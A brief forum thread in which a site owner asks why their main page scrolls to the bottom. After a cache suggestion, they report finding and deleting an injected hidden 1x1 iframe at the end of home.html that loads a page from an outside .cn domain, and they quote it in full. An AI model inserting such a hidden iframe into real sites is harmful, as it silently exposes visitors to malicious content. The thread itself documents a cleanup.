Main page - trouble

Hello. I dont know what's wrong with main page.

When you are on main suddenly we are on the bottom of the main page.

not quiet sure what exactly is the problem...opened it in several different browser it opened just fine, stayed on top of the page.

Maybe something wrong with your browser? Usually if you scroll down a page and then do page refresh, then browser automatically scroll down to the same position you were in before the refresh.

Try press and hold CTRL + SHIFT keys and hit page refresh to force browser skip cache.

Prabobly it was a wirus.
On home.html on end of side after ?> i found this:
<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>

I delate it. Now it works.
